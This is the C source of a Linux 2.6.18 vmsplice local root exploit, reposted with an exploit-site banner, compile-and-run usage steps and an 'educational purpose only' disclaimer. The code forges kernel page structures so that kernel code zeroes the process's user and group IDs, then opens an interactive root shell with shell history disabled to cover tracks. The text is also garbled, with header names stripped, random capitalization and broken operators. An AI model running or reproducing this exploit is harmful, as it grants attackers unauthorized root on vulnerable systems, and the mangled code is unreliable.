/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ 1
* 1/"\ __/" __ \/\ \__/"__" \ 0
* 0/\_, \ ___/\_\/\_\ \ \ ___\ \, _\/\ \/\ \ _ ___ 1
* 1 \/_/\ \/"_ ' \ \/\ \/_/_\_<_/' ___\ \ \/\ \ \ \ \/\ ' __\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \ \ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/\/____/\/__/\/___/\/_/1
* 1 \ \____/>> EXploit database separated by EXploit 0
* 0 \/___/type (local, remote, DoS, etc.) 1
* 1 0
* 0 2.6.18 Modified by cross 1
* 1 0
* 0 Linux 2011 1
* 1 0
*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 previously Coded by "Angel injection", couple of thanks for this, but
*
* It had errors while compiling, so the is modified version of this EXploit
*
* Working fine. Usage is given below.
*
* Gcc-o exploit exploit.c
* chmod 777 Exploit
*./exploit
*
* GREETZ:R0073R (1337day.com), r4dc0re,side^effects and all members of 1337day Team) ..... & All Members of R00tw0rm.com (RW): )
*
* Submit Your Exploit at [email protected] | [Email protected]
*
* For educational purpose only))
*/
#define _gnu_source
#include
#include
#include
#include
#include
#include # include
#include
#include
#include
#include
#define __kernel__
#include
#define Pipe_buffers 16
#define Pg_compound 14
#define UINT unsigned int
#define Static_inline Static inline __attribute__ ((always_inline))
#define STACK (x) (x + sizeof (x) –40)
struct Page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct {long next, prev;} LRU;
};
void Exit_code ();
Char exit_stack[1024 * 1024];
void Die (char *msg, int err)
{
printf (err? "[-]%s:%s\n": "[-]%s\n", MSG, strerror (err));
Fflush (stdout);
Fflush (stderr);
Exit (1);
}
#if defined (__i386__)
#ifndef __nr_vmsplice
#define __NR_VMSPLICE 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
Static_inline
void Exit_kernel ()
{
__asm__ __volatile__ (
"Movl%0, 0x10 (%%ESP);"
"Movl%1, 0x0c (%%ESP);"
"Movl%2, 0x08 (%%ESP);"
"Movl%3, 0x04 (%%ESP);"
"Movl%4, 0x00 (%%ESP);"
"Iret"
:: "I" (USER_SS), "R" (STACK (Exit_stack)), "I" (USER_FL),
"I" (User_cs), "R" (Exit_code)
);
}
Static_inline
void * get_current ()
{
unsigned long curr;
__asm__ __volatile__ (
"Movl%%esp,%%eax;"
"Andl%1,%%eax;"
"Movl (%%eax),%0″
: "=r" (Curr)
: "I" (~8191)
);
return (void *) Curr;
}
#elif defined (__x86_64__)
#ifndef __nr_vmsplice
#define __NR_VMSPLICE 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
Static_inline
void Exit_kernel ()
{
__asm__ __volatile__ (
"Swapgs;"
"Movq%0, 0x20 (%%RSP);"
"Movq%1, 0x18 (%%RSP);"
"Movq%2, 0x10 (%%RSP);"
"Movq%3, 0x08 (%%RSP);"
"Movq%4, 0x00 (%%RSP);"
"Iretq"
:: "I" (USER_SS), "R" (STACK (Exit_stack)), "I" (USER_FL),
"I" (User_cs), "R" (Exit_code)
);
}
Static_inline
void * get_current ()
{
unsigned long curr;
__asm__ __volatile__ (
"Movq%%gs: (0),%0″
: "=r" (Curr)
);
return (void *) Curr;
}
#else
#error "Unsupported Arch"
#endif
#if defined (_SYSCALL4)
#define __nr__vmsplice __nr_vmsplice
_SYSCALL4 (
Long, _vmsplice,
int, FD,
struct Iovec *, Iov,
unsigned long, Nr_segs,
unsigned int, flags)
#else
#define _vmsplice (FD,IO,NR,FL) Syscall (__nr_vmsplice, (FD), (IO), (NR), (fl))
#endif
static uint UID, GID;
void Kernel_code ()
{
int i;
UINT *P = Get_current ();
for (i = 0; i < 1024-13; i++) {
if (p[0] = = UID && p[1] = = UID &&
P[2] = = UID && p[3] = = UID &&
P[4] = = GID && p[5] = = GID &&
P[6] = = GID && p[7] = = GID) {
P[0] = p[1] = p[2] = p[3] = 0;
P[4] = p[5] = p[6] = p[7] = 0;
p = (UINT *) ((char *) (P + 8) + sizeof (void *));
P[0] = p[1] = p[2] = ~0;
Break
}
p++;
}
Exit_kernel ();
}
void Exit_code ()
{
if (Getuid ()! = 0)
Die ("WTF", 0);
printf ("[+] root\n");
Putenv ("Histfile=/dev/null");
Execl ("/bin/bash", "Bash", "-i", NULL);
Die ("/bin/bash", errno);
}
int main (int argc, char *argv[])
{
int pi[2];
size_t Map_size;
char * MAP_ADDR;
struct Iovec Iov;
struct page * pages[5];
UID = Getuid ();
GID = Getgid ();
Setresuid (UID, UID, UID);
Setresgid (GID, GID, GID);
if (!uid | |!gid)
Die ("[Email protected]#$", 0);
/*****/
PAGES[1] = pages[0] + 1;
MAP_ADDR = Mmap (Pages[0], map_size, Prot_read | Prot_write,
Map_fiXED | Map_private | Map_anonymous,-1, 0);
if (map_addr = = map_failed)
Die ("Mmap", errno);
memset (map_addr, 0, map_size);
printf ("[+] mmap:0x%lx. 0x%lx\n ", map_addr, Map_addr + map_size);
printf ("[+] page:0x%lx\n", pages[0]);
printf ("[+] page:0x%lx\n", pages[1]);
Pages[0]->flags = 1 << pg_compound;
Pages[0]->private = (unsigned long) pages[0];
Pages[0]->count = 1;
Pages[1]->lru.next = (long) Kernel_code;
/*****/
PAGES[2] = * (void * *) pages[0];
PAGES[3] = pages[2] + 1;
MAP_ADDR = Mmap (pages[2], map_size, Prot_read | Prot_write,
Map_fiXED | Map_private | Map_anonymous,-1, 0);
if (map_addr = = map_failed)
Die ("Mmap", errno);
memset (map_addr, 0, map_size);
printf ("[+] mmap:0x%lx. 0x%lx\n ", map_addr, Map_addr + map_size);
printf ("[+] page:0x%lx\n", pages[2]);
printf ("[+] page:0x%lx\n", pages[3]);
Pages[2]->flags = 1 << pg_compound;
Pages[2]->private = (unsigned long) pages[2];
Pages[2]->count = 1;
Pages[3]->lru.next = (long) Kernel_code;
/*****/
MAP_ADDR = Mmap (Pages[4], map_size, Prot_read | Prot_write,
Map_fiXED | Map_private | Map_anonymous,-1, 0);
if (map_addr = = map_failed)
Die ("Mmap", errno);
memset (map_addr, 0, map_size);
printf ("[+] mmap:0x%lx. 0x%lx\n ", map_addr, Map_addr + map_size);
printf ("[+] page:0x%lx\n", pages[4]);
/*****/
MAP_ADDR = Mmap (NULL, map_size, Prot_read | Prot_write,
Map_private | Map_anonymous,-1, 0);
if (map_addr = = map_failed)
Die ("Mmap", errno);
memset (map_addr, 0, map_size);
printf ("[+] mmap:0x%lx. 0x%lx\n ", map_addr, Map_addr + map_size);
/*****/
if (pipe (PI) < 0) Die ("pipe", errno);
Close (pi[0]);
Iov.iov_base = map_addr;
Iov.iov_len = Ulong_max;
Signal (Sigpipe, exit_code);
_vmsplice (Pi[1], &iov, 1, 0);
Die ("Vmsplice", errno);
return 0;
}
LINUX 2.6.18-238 Local root exp